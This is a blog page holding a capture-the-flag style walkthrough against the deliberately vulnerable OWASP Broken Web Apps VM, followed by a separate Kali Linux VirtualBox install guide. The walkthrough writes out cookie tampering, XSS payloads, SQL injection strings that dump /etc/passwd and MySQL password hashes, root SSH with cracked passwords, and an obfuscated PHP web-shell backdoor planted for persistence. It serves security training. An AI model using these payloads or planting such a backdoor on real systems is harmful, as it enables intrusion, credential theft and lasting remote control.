OWASP Broken Web Apps VM – Vicnum – boot2root challenge Walkthrough

While going over the OWASP top 10 again recently I decided to create a few guides using the OWASP Broken Web Apps VM and show how easy it is to attack these systems. The OWASP top 10 is a great list of methods usually employed to gain access to systems and also to secure them. Why use that zero day you have when you can just attack a system like it’s 1999 again!

What you will need for this exercise:

1 – Kali installed and configured
2 – Pfsense Configured
3 – OWASP Broken Web Apps VM

Step one perform some active reconnaissance with the OWASP Zed Attack Proxy (ZAP) on Kali, enter the URL or IP address of your vulnerable OWASP BWA system you’re attacking and click attack to let ZAP do all the hard work for you!

1_OWASP_Zed_Attack_Proxy_(ZAP)_scanning

1_OWASP_Zed_Attack_Proxy_(ZAP)_scanning

From the scan I picked a random URI /vicnum/ to inspect further

2_Selecting_target_Web_Application_Vicnum

2_Selecting_target_Web_Application_Vicnum

Playing the Guessnum game is simple, keep picking 3 digit numbers until you guess all three in the correct positions. I played the game and had the Firefox plugin firebug enabled while doing so. This lead me to something interesting when I won, some cookies with the values of my current player named “zorn”.

3_Playing_Vicnum

3_Playing_Vicnum

I correctly guessed 612 in 15 guesses! I’m happy with that but what if I wanted to get an even better score of 3 or even 0. Let’s make that happen! Looking at the page located in the following URI /vicnum/guessnum4.php you’ll see something interesting if you have firebug open. Names of cookies, these cookies can be manipulated to send information to the database and modify the results we see on the screen!

Looking at the cookies from the top down:

1 – Milano with the value of 0012AA9B12goodzorn
2 – Brussels with the value of 0029A9B91crisp15
3 – Geneva with the value of 92BEF345Apecan612

Changing the end values of the cookie in this case zorn, 15 & 612 you can manipulate the database and create your own score

4_Modifying_Vicnum_cookies

4_Modifying_Vicnum_cookies

Refresh the page and you are now at the top of the leader board!

5_Vicnum_score_modifed_cookie_manipulation

5_Vicnum_score_modifed_cookie_manipulation

Above by changing the cookie values to the following yielded an excellent score:

1 – Milano with the value of 0012AA9B12gooditfellover
2 – Brussels with the value of 0029A9B91crisp3
3 – Geneva with the value of 92BEF345Apecan123

Congratulations you just became the best player at Guessnum!

Let’s go back to ZAP and see what else we can look at:

6_OWASP_Zed_Attack_Proxy_(ZAP)_alerts

6_OWASP_Zed_Attack_Proxy_(ZAP)_alerts

Maybe a little Reflected Cross Site Scripting next, ZAP is great as it gives you descriptions on how the attack is performed and also solutions for securing your web application.

Checking if Reflected Cross Site Scripting is working on this page as suggested by ZAP we can try the following snippet below entered into the Guessnum player name field to check:

7_OWASP_Vicnum_Cross_Site_Scripting_Testing_Player_Name

7_OWASP_Vicnum_Cross_Site_Scripting_Testing_Player_Name

8_Vicnum_Cross_Site_Scripting_Testing_Player_Name_Output

8_Vicnum_Cross_Site_Scripting_Testing_Player_Name_Output

This succesfully worked and a little non malicious pop up appeared on the screen, this could have been used for malicious means though. This is where the NoScript plugin for browsers shines as it blocks these attacks while browsing the web, keeping you safe as you wander around looking at random pictures of funny cats.

An interesting XSS attack using a URL which modifies the cookie parameter is this one as it will keep the session and will come back every time you refresh the page which is nice temporary persistence.

9_Vicnum_Cross_Site_Scripting_Testing_URL_field

9_Vicnum_Cross_Site_Scripting_Testing_URL_field

Using URL encoding to obfuscate it a bit so it’s not as obvious to the clicker of the link:

#!/usr/bin/env python

# urllib is needed for the URL encoding
import urllib

# URL is equal to the URL that is used
URL = ‘http://192.168.1.102/vicnum/union1.php?admin=N&unionname=’
# XSS is equal to the XSS cookie test alert
XSS = ‘<script>alert(“URL XSS Test”);</script>’

# printing the value of URL and XSS together encoded in URL encoding to give us the encoded URL value. More on URL encoding and quote_plus can be seen here.
print URL + urllib.quote_plus(XSS)

10_Vicnum_Cross_Site_Scripting_python_URL_encoder

10_Vicnum_Cross_Site_Scripting_python_URL_encoder

Below shows creation of the script above urlencode.py, chmodding it to make it executable and the results of running the script:

11_Vicnum_Cross_Site_Scripting_python_URL_encoder_chmod_script_execution

11_Vicnum_Cross_Site_Scripting_python_URL_encoder_chmod_script_execution

The output of the script with the URL encoded looks like this:

12_Vicnum_Cross_Site_Scripting_python_URL_encoded

12_Vicnum_Cross_Site_Scripting_python_URL_encoded

The result of executing the encoded URL can be seen below:

13_Vicnum_Cross_Site_Scripting_python_URL_encoded_output

13_Vicnum_Cross_Site_Scripting_python_URL_encoded_output

Below I entered some JavaScript Cross Site Scripting to print the cookies of the currently logged in player in the Guessnum player name field under the /vicnum/guessnum4.php URI. itfellover in this case was the current player at the time. It doesn’t make a difference if you know the player name or not I could have entered “dfgdfg” or just the JavaScript on it’s own to alert on the document.cookie result printing the same alert box.

14_Vicnum_itfellover_Cross_Site_Scripting_Cookie_stealing

14_Vicnum_itfellover_Cross_Site_Scripting_Cookie_stealing

15_Vicnum_itfellover_Cross_Site_Scripting_Cookie_stealing_entered

15_Vicnum_itfellover_Cross_Site_Scripting_Cookie_stealing_entered

The output seen once this is executed shows the player name itfellover to have been requested from Guessnum who had just played the game and gained a score of 12 by correctly guessing 912 to be the numbers selected for his game.

16_Vicnum_itfellover_Cross_Site_Scripting_Cookie_stealing_output

16_Vicnum_itfellover_Cross_Site_Scripting_Cookie_stealing_output

If we wanted to steal the cookies on the page we could do so and send them back to an attacking system, for the purpose of this exercise we’ll print the cookies out on the page with the following modified URL below:

17_Vicnum_itfellover_Cross_Site_Scripting_Cookie_stealing_URL

17_Vicnum_itfellover_Cross_Site_Scripting_Cookie_stealing_URL

18_Vicnum_itfellover_Cross_Site_Scripting_Cookie_stealing_URL_output

18_Vicnum_itfellover_Cross_Site_Scripting_Cookie_stealing_URL_output

This is excellent, this site is clearly vulnerable to XSS and cookie manipulation but what else can be poked at. Go back to ZAP and see what else it’s detected.

Navigating to http://192.168.1.102/vicnum/cgi-bin/ will show us a directory listing for this web application:

19_Vicnum_directory_listing

19_Vicnum_directory_listing

SQL Injection:

A simple quote ‘ in the “Guessnum Player” name entry field – http://192.168.1.102/vicnum/guessnum.html – yields an interesting unsanitised error giving information regarding the database used for the web application.

20_Vicnum_SQL_Injection_testing

20_Vicnum_SQL_Injection_testing

Output seen below

You have requested results for Guessnum player ‘ :ERROR in SELECT name,guess,count,tod FROM guessnumresults WHERE name = ”’ You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ””’ at line 1

This is great as it tells us MySQL is in use for this web application and also gives some hints as to what we can use in SQL statements to call from the database

SELECT name,guess,count,tod FROM guessnumresults WHERE name =

You can find out how to emulate the table structure using “union” with this link. This link will help specify a column in the database.

21_Vicnum_SQL_Error_Output

21_Vicnum_SQL_Error_Output

Trying next a very basic piece of SQL injection

‘ OR ‘a’=’a

22_Vicnum_SQL_Injection_statement_test

22_Vicnum_SQL_Injection_statement_test

This gives us all the users scores stored in the database:

23_Vicnum_SQL_Injection_Player_database_score_dump

23_Vicnum_SQL_Injection_Player_database_score_dump

Listing the contents of etc passwd using load_file:

‘ UNION ALL SELECT 1,2,3,load_file(‘/etc/passwd’)#

24_Vicnum_SQL_Injection_etc_passwd_dump

24_Vicnum_SQL_Injection_etc_passwd_dump

List all mysql users and their hashed passwords:

‘ UNION ALL SELECT 1,2,user,password FROM mysql.user#

25_Vicnum_SQL_Injection_users_and_password_hashes_dump

25_Vicnum_SQL_Injection_users_and_password_hashes_dump

This lists everything in the mysql database:

‘ UNION ALL SELECT 1,table_schema,table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’#

26_Vicnum_SQL_Full_database_dump

26_Vicnum_SQL_Full_database_dump

Delicious password hashes but what are they exactly? Let’s find out by first checking the length of the hashes with a quick python script

#!/usr/bin/env python

print len(73316569DAC7839C2A784FF263F5C0ABBC7086E2)

27_Vicnum_simple_python_password_hash_count

27_Vicnum_simple_python_password_hash_count

Chmoding the script to make it executable and running it:

chmod +x ba <– making the script “ba” executable

./ba <– running the executable

28_Vicnum_simple_python_password_hash_count_chmod_and_run

28_Vicnum_simple_python_password_hash_count_chmod_and_run

40 characters long which means it’s SHA-1

Let’s create a list with all the hashes by first pasting in the whole page of text like you see below:

29_Vicnum_password_hash_list

29_Vicnum_password_hash_list

Once that’s done let’s clean it up with some awk and sed magic:

awk ‘{print $NF}’ hashes | sed ‘s . ‘ | sed ‘/^\s*$/d’

awk ‘{print $NF}’ hashes <– Prints out the end of the line which is the hash
sed ‘s . ‘ <– This gets rid of the * at the start of the SHA-1 hash
sed ‘/^\s*$/d’ <– Gets rid of all the whitespace

Which leaves us with this output:

30_Vicnum_password_hashes_sorted

30_Vicnum_password_hashes_sorted

73316569DAC7839C2A784FF263F5C0ABBC7086E2
D5D9F81F5542DE067FFF5FF7A4CA4BDD322C578F
D5D9F81F5542DE067FFF5FF7A4CA4BDD322C578F
75F15FF5C9F06A7221FEB017724554294E40A327
D5D9F81F5542DE067FFF5FF7A4CA4BDD322C578F
C7847100CDBE29050A338F78EA71F066D196ED98
C260A4F79FA905AF65142FFE0B9A14FE0E1519CC
CA1F8B079BB2857835107EA008871B4691769547
D67B38CDCD1A55623ED5F55856A29B9654FF823D
E82A07F59B0D83BEF29F79E41FA0F8A042CE3DE4
3758F91540524F48F92FE932883C54F6E802A13A
3D118FD3FFC74F534A493C30ADC1F23A48510D9D
30B462BE16C04867D06113304F664BB9A5B573D8
5297BE816CC703E8CB686D205071E9CD9E8F08A4
9AE953952D993ED69779E70E28193A1EB8DDF91C
C238B1FA6D14124C867DC9634DEB2CD731212094
8FC7327502AA1203AAE881C4A5E2AA1CD6E46CE8
82183BF1F275E47C2692B1CF81CB7A8FD16CE5EA
E2E1F0A3459647AACF63319694BCBD107231B10C
DF0F41B82DFDB4AA462186480FA9922EF4BBFCEB
48529BB639EC6E4C2A6695C4B3D544A9E2A21D4C
F70658E9BDD2910AC33ACDA164605DFC1DA70A68
6126D5A029ACE603DBF187A301C1CCEAEDCFE232
E5C4AA1177F0A69A9E124CDC2676D4ECCE01E347
ED2048BBC6AFD6E2186982869C7899A7EF38C066
10A99DBC0772291AA6AF9A1A9271945340E4E812
47A91042510E7E966EF4075A934A77A57A9E71FE
02EAFACD13AEC2C2E139EA38903B9A84A165DF0B
0F44FA14B9DFBBFFBDF2F7692868DE1B997C66ED
93ADDFABFCD5A66C95E97C73240D373413A01275
E0E85D302E82538A1FDA46B453F687F3964A99B4
5FA5F4C9ACD2CA5C1EB9E0EC80175D5FCAA0D7D6
8028371417372EDAD5755F9653E93D7C1E87564C
1DB6D61428C07B8E8D6876CC60ECAD01D2CE844A
2132873552FEDF6780E8060F927DD5101759C4DE
4BA609A0C9C18D80985519932BAC08C604119234
255195939290DC6D228944BCC682D2427DA57E21
63C3CE60C4AC4F87F321E54F290A4867684A96C4

Let’s throw this at hashkiller’s SHA-1 Decrypter and see if it’s already cracked the hashes and save us some work:

31_Vicnum_password_hashes_cracked_Hashkiller

31_Vicnum_password_hashes_cracked_Hashkiller

All but 5 hashes have been cracked, this is excellent, we can definitely gain access to the system now and own the box fully!

First trying to ssh in as root with the first password in the list “owaspbwa”:

ssh root@192.168.1.102 <– ssh as the user root to 192.168.1.102

32_Vicnum_ssh_root_success_first_attempt

32_Vicnum_ssh_root_success_first_attempt

And we’re in as root and we have mail, how kind, we should read it!

cd /var/spool/mail <– Your mail is kept her on most Linux systems

33_Vicnum_OWASP_BWA_mail_directory

33_Vicnum_OWASP_BWA_mail_directory

There is a wealth of information in here, especially the www-data mail log is filled with interesting URL’s and passwords! Let’s add some persistence for now and call it a day with WeBaCoo and create an obfuscated PHP backdoor to leave on the box for persistence.

webacoo -g -o backdoor.php

-g Generate backdoor code
-o Generated backdoor output filename

cat backdoor.php <– Verifies the newly created backdoor

34_Vicnum_OWASP_BWA_WeBaCoo_PHP_backdoor

34_Vicnum_OWASP_BWA_WeBaCoo_PHP_backdoor

On the OWASP BWA system as we already have root on the box we can go anywhere and do anything so let’s place the backdoor.php code in the apache /var/www/ directory so we can come back at any time and gain access again even if the password is changed for example.

cd /var/www <– change to the /var/www web directory

35_Vicnum_OWASP_BWA_web_directory

35_Vicnum_OWASP_BWA_web_directory

Create the obfuscated backdoor in the /var/www/ web directory

cat > backdoor.php <– cat with > will allow you to append text to a file quickly without opening another editor

Paste your own WeBaCoo backdoor and hit CTRL + C to exit cat:
<?php $b=strrev(edoced_4.6esab);eval($b(str_replace( ,,a W Y o a X N z Z X Q o J F 9 D T 0 9 L S U V b J 2 N t J 1 0 p K X t v Y l 9 z d G F y d C g p O 3 N 5 c 3 R l b S h i Y X N l N j R f Z G V j b 2 R l K C R f Q 0 9 P S 0 l F W y d j b S d d K S 4 n I D I + J j E n K T t z Z X R j b 2 9 r a W U o J F 9 D T 0 9 L S U V b J 2 N u J 1 0 s J F 9 D T 0 9 L S U V b J 2 N w J 1 0 u Y m F z Z T Y 0 X 2 V u Y 2 9 k Z S h v Y l 9 n Z X R f Y 2 9 u d G V u d H M o K S k u J F 9 D T 0 9 L S U V b J 2 N w J 1 0 p O 2 9 i X 2 V u Z F 9 j b G V h b i g p O 3 0 = ))); ?>

cat backdoor.php <– This is to verify your backdoor was pasted correctly

36_Vicnum_OWASP_BWA_WeBaCoo_backdoor_deployed

36_Vicnum_OWASP_BWA_WeBaCoo_backdoor_deployed

Finally a quick check that the backdoor works correctly before we call it a day

webacoo -t -u http://192.168.1.102/backdoor.php

37_Vicnum_OWASP_BWA_WeBaCoo_backdoor_confirmation_test_success

37_Vicnum_OWASP_BWA_WeBaCoo_backdoor_confirmation_test_success

Congratulations, that was a fun challenge. I look forward to creating some further OWASP BWA tutorials. I hope you have fun playing around with the OWASP Broken Web Applications VM as much as I do!

 

Building an Ethical hacking lab on your laptop with VirtualBox – Part 16 – Kali Linux 2.0 Rolling

Kali Linux was updated a while back and since has had many nice features added to it. I’ve covered other methods of creating your own custom Kali ISO and installing Kali in VirtualBox before. Check out the previous VirtualBox guide for basic configuration and then follow along to complete the updated Kali 2.0 Rolling installation and get guest additions working as it’s changed a little since my last guide.

What you’ll need is the following:

1 – VirtualBox installed with guest additions downloaded
2 – Kali Linux 2.0 ISO downloaded

As mentioned already refer to the previous guide for basic VirtualBox configuration.

Let’s get to it!

Select Install on first boot to start of the installation

1_Kali_Linux_2.0_VirtualBox_Install_select_install

1_Kali_Linux_2.0_VirtualBox_Install_select_install

Select your desired language

2_Kali_Linux_2.0_VirtualBox_Install_select_language

2_Kali_Linux_2.0_VirtualBox_Install_select_language

Select your country

3_Kali_Linux_2.0_VirtualBox_Install_select_country

3_Kali_Linux_2.0_VirtualBox_Install_select_country

Select your desired keyboard configuration

4_Kali_Linux_2.0_VirtualBox_Install_select_keyboard_layout

4_Kali_Linux_2.0_VirtualBox_Install_select_keyboard_layout

Enter a hostname for your system

5_Kali_Linux_2.0_VirtualBox_Install_enter_a_hostname

5_Kali_Linux_2.0_VirtualBox_Install_enter_a_hostname

Enter a domain name if you want to use one otherwise just hit “Continue”

6_Kali_Linux_2.0_VirtualBox_configure_DNS_if_needed

6_Kali_Linux_2.0_VirtualBox_configure_DNS_if_needed

Enter your the password you want to use for the root account and hit “Continue”

7_Kali_Linux_2.0_VirtualBox_configure_enter_root_password

7_Kali_Linux_2.0_VirtualBox_configure_enter_root_password

Verify your root password and hit “Continue”

8_Kali_Linux_2.0_VirtualBox_configure_enter_root_password_confirmation

8_Kali_Linux_2.0_VirtualBox_configure_enter_root_password_confirmation

Hit “Enter” to continue the hard disk partitioning using the “Guided – use entire disk” method. Feel free to choose a different method if you wish.

9_Kali_Linux_2.0_VirtualBox_configure_select_disk_partitioning

9_Kali_Linux_2.0_VirtualBox_configure_select_disk_partitioning

Hit “Enter” to continue using the selected partition for the hard disk install

10_Kali_Linux_2.0_VirtualBox_configure_select_disk_to_partition

10_Kali_Linux_2.0_VirtualBox_configure_select_disk_to_partition

Hit “Enter” to continue installation using the “All files in one partition” partitioning scheme. Feel free to change it.

11_Kali_Linux_2.0_VirtualBox_configure_select_partitioning_scheme

11_Kali_Linux_2.0_VirtualBox_configure_select_partitioning_scheme

Select “Finish partitioning and write changes to disk” and hit “Enter”

12_Kali_Linux_2.0_VirtualBox_configure_write_changes_to_disk

12_Kali_Linux_2.0_VirtualBox_configure_write_changes_to_disk

Select “Yes” to confirm you want to write all your changes to disk and hit “Enter”

13_Kali_Linux_2.0_VirtualBox_configure_write_changes_to_disk_confirmation

13_Kali_Linux_2.0_VirtualBox_configure_write_changes_to_disk_confirmation

Select “No” to use a network mirror

14_Kali_Linux_2.0_VirtualBox_configure_select_no_for_a_mirror

14_Kali_Linux_2.0_VirtualBox_configure_select_no_for_a_mirror

Select “Yes” and hit enter to install the GRUB boot loader to the master boot record

15_Kali_Linux_2.0_VirtualBox_configure_select_yes_to_install_the_GRUB_bootloader

15_Kali_Linux_2.0_VirtualBox_configure_select_yes_to_install_the_GRUB_bootloader

Select your hard disk you want to install the GRUB boot loader on and hit “Enter”

16_Kali_Linux_2.0_VirtualBox_configure_select_disk_to_install_the_GRUB_bootloader

16_Kali_Linux_2.0_VirtualBox_configure_select_disk_to_install_the_GRUB_bootloader

Installation is now complete, select “Continue” and hit “Enter” to reboot into your new Kali install

17_Kali_Linux_2.0_VirtualBox_configured_ready_to_reboot

17_Kali_Linux_2.0_VirtualBox_configured_ready_to_reboot

At first login enter the username “root” followed by the password you entered at the start of the install

18_Kali_Linux_2.0_VirtualBox_configured_first_login

18_Kali_Linux_2.0_VirtualBox_configured_first_login

Excellent, first logon was a success. Well done so far only a few steps remain until you can start playing in your lab

19_Kali_Linux_2.0_VirtualBox_configured_first_logon

19_Kali_Linux_2.0_VirtualBox_configured_first_logon

During install we didn’t add repositories but in order to update and upgrade the system we’ll need to modify the /etc/apt/sources.lst. Use a text editor of choice of use nano like the example below.

20_Kali_Linux_2.0_VirtualBox_modify_apt_sources_list

20_Kali_Linux_2.0_VirtualBox_modify_apt_sources_list

Add the following repositories to the file then save it. If using nano like in the example do this pressing CTRL+O and pressing enter. Exit with CTRL + X

deb http://http.kali.org/kali kali-rolling main contrib non-free
deb-src http://http.kali.org/kali kali-rolling main contrib non-free

21_Kali_Linux_2.0_VirtualBox_modify_apt_sources_list_repositories

21_Kali_Linux_2.0_VirtualBox_modify_apt_sources_list_repositories

Now that you have some repositories enter the following command into the terminal and hit “Enter”. This will take some time to complete so go grab a beverage of choice and chill out for a bit.

sudo apt-get update && sudo apt-get upgrade -y && sudo apt-get dist-upgrade -y

22_Kali_Linux_2.0_VirtualBox_update_upgrade_dist_upgrade

22_Kali_Linux_2.0_VirtualBox_update_upgrade_dist_upgrade

When prompted to restart services during package upgrades without asking select “Yes” and hit “Enter”

23_Kali_Linux_2.0_VirtualBox_update_upgrade_dist_upgrade_select_yes_to_restart_during_package_upgrades

23_Kali_Linux_2.0_VirtualBox_update_upgrade_dist_upgrade_select_yes_to_restart_during_package_upgrades

When prompted if non-superusers should be able to capture packets with Wireshark select “No” and hit “Enter”

24_Kali_Linux_2.0_VirtualBox_select_no_to_disallow_non_superusers_capture_packets_wireshark

24_Kali_Linux_2.0_VirtualBox_select_no_to_disallow_non_superusers_capture_packets_wireshark

Select “Ok” regarding the PostgreSQL version 9.5 obsolete warning and hit “Enter”

25_Kali_Linux_2.0_VirtualBox_select_OK_postgresql_common

25_Kali_Linux_2.0_VirtualBox_select_OK_postgresql_common

If prompted to keep any configurations enter “Y” and hit “Enter” to continue

26_Kali_Linux_2.0_VirtualBox_enter_Y_to_keep_defaults

26_Kali_Linux_2.0_VirtualBox_enter_Y_to_keep_defaults

It took sometime but if you’ve gotten this far your doing well. Enter “reboot” and hit “Enter”

27_Kali_Linux_2.0_VirtualBox_update_upgrade_dist_upgrade_complete

27_Kali_Linux_2.0_VirtualBox_update_upgrade_dist_upgrade_complete

This is where things have changed, if you refer to the previous guides on my blog you’ll see installing Virtual Box Guest additions used to be different, now however all you have to do is enter the following

sudo apt-get install -y virtualbox-guest-x11

28_Kali_Linux_2.0_VirtualBox_Install_Guest_Additions

28_Kali_Linux_2.0_VirtualBox_Install_Guest_Additions

Once the installation is complete enter “reboot” and hit “Enter”

29_Kali_Linux_2.0_VirtualBox_Guest_Additions_installed_reboot

29_Kali_Linux_2.0_VirtualBox_Guest_Additions_installed_reboot

You will now have a big full screen and all the other features of Virtual Box Guest additions available

30_Kali_Linux_2.0_VirtualBox_Guest_Additions_installed_rebooted_and_full_screen_achieved

30_Kali_Linux_2.0_VirtualBox_Guest_Additions_installed_rebooted_and_full_screen_achieved

I figured a guide was necessary as I had some issues myself the first time I installed the latest version and imagine others have had the same problem.

That’s it for now, well done getting Kali installed and configured. Have fun playing in your lab!